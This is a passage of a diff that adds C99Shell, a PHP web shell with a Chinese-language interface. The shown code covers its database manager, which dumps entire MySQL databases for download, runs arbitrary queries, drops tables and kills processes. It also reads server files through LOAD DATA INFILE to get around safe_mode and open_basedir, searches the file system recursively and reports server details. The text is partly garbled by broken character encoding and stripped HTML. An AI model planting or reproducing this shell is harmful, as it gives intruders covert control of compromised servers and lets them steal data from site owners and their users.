$set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("错误: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "错误:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo ""; + if ($tbl_struct) + { + echo "
    "; if (($sql_query) and (!$submit)) {echo "你真的想这样åšå—?";} else {echo "SQL-Query";} echo ":



     
    域:
    "; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "?".$name."
    ";} + echo "
    "; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "å¼€å¯ (secure)"; +} +else {$safemode = FALSE; $hsafemode = "关闭 (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";} +else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><?php echo getenv("HTTP_HOST"); ?> - [L.S.T]-phpshell +
    +

    !C99Shell v.!

    æœåŠ¡å™¨ç›¸å…³ä¿¡æ¯:  

    uname -a: ",1); ?> 

    用户å:",1);} else {echo get_current_user();} ?> 

    PHP安全模å¼æ˜¯å¦å¼€å¯: 

    网站在æœåŠ¡å™¨ä¸­çš„ä½ç½®ï¼š".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; + $i++; +} +echo "   "; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = FALSE; + $wdt = "[åªè¯»]"; + echo "".view_perms_color($d).""; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "
    硬盘空间信æ¯ï¼šFree ".view_size($free)." of ".view_size($total)." (".$free_percent."%)"; +} +echo "
    "; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "".$letter."";} + $letters .= " ] "; + } + } + if (!empty($letters)) {echo "æœåŠ¡å™¨ç£ç›˜: ".$letters."
    ";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; + } +} +echo "


    "; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
    ".$donated_html."

    ";} +echo ""; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i])."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode("",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo ""; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "
    "; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?>

    注æ„! SQL-Manager is NOT ready module! Don't reports bugs.

    "; + if (!$sql_sock) {?>"; + } + echo "
    SQL 管ç†:
    "; + if (!$sql_sock) + { + if (!$sql_server) {echo "æ‹’ç»è¿žæŽ¥";} + else {echo "
    无法连接
    "; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + } + echo "
    !
  • If login is null, login is owner of process.
  • 如果主机为空,则主机为本地主机(LOCAL)
  • 如果端å£ä¸ºç©ºï¼Œåˆ™é»˜è®¤ç«¯å£ä¸ºï¼š3306
  •  è¯·å¡«å†™è¡¨å•:
    用户å密砠数æ®åº“ 
    主机端å£
    " class="STYLE1">主页 +
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "?nbsp;".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "æ•°æ®åº“中没有表.";} + } + } + else + { + ?>
    主页

    + 请选择一个数æ®åº“ +
    +
    "; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
    有 ".$c." 表在这个数æ®åº“里 (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "错误:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "你真的想è¦è¿™æ ·:";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    创建新表: +
     
    转存数æ®åº“: +
    "> 
    ";} + if ($sql_act == "newtbl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" å·²ç»æ·»åŠ æˆåŠŸ!
    "; + } + else {echo "无法添加数æ®åº“ \"".htmlspecialchars($sql_newdb)."\".
    原因: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "
    SQL-存储:

    "; + echo "DB: 

    "; + $v = join (";",$dmptbls); + echo "åªæœ‰è¡¨(explode \";\") 1: 

    "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "文件: 

    "; + echo "下载:  

    "; + echo "ä¿å­˜åˆ°æ–‡ä»¶:  "; + echo "



    1 - all, if empty"; + echo "
    "; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "存储错误! 无法写入到 \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "已转存!转存已写入到 \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump:什么都没有åš!";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "结构 ]   "; + echo "æµè§ˆ ]   "; + echo "存储 ]   "; + echo "æ’å…¥ ]   "; + if ($sql_tbl_act == "structure") {echo "

    å³å°†è¿›å…¥!";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "

    æ’入列到表中:
    "; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
    "; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
    域类型功能值
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "作为新列æ’å…¥"; + if (!empty($sql_tbl_insert_q)) {echo " or ä¿å­˜"; echo "";} + echo "

    "; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
    "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
    From:  To:  
    "; + echo "
    "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "空";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    动作
    ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

     

    "; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
    "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    表
    列类型增加修改大å°è¡Œä¸º
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    ?/b>
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?>
    创建数æ®åº“: +
     
    查看文件: +
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" å·²æˆåŠŸæ·»åŠ !
    ";} + else {echo "无法添加数æ®åº“ \"".htmlspecialchars($sql_newdb)."\".
    原因:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    æœåŠ¡å™¨çŠ¶æ€å˜é‡:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    å字值
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    æœåŠ¡å™¨å˜é‡:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    å字值
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "结æŸè¿›ç¨‹ #".$kill."... ok. 终结了, 阿门.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    进程:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    ID用户主机数æ®åº“命令时间状æ€ä¿¡æ¯Action
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "读å–文件错误(æƒé™æ‹’ç»)!";} + else + { + for ($i=0;$i文件 \"".$sql_getfile."\" ä¸å­˜åœ¨æˆ–为空!
    ";} + else {echo "文件 \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "
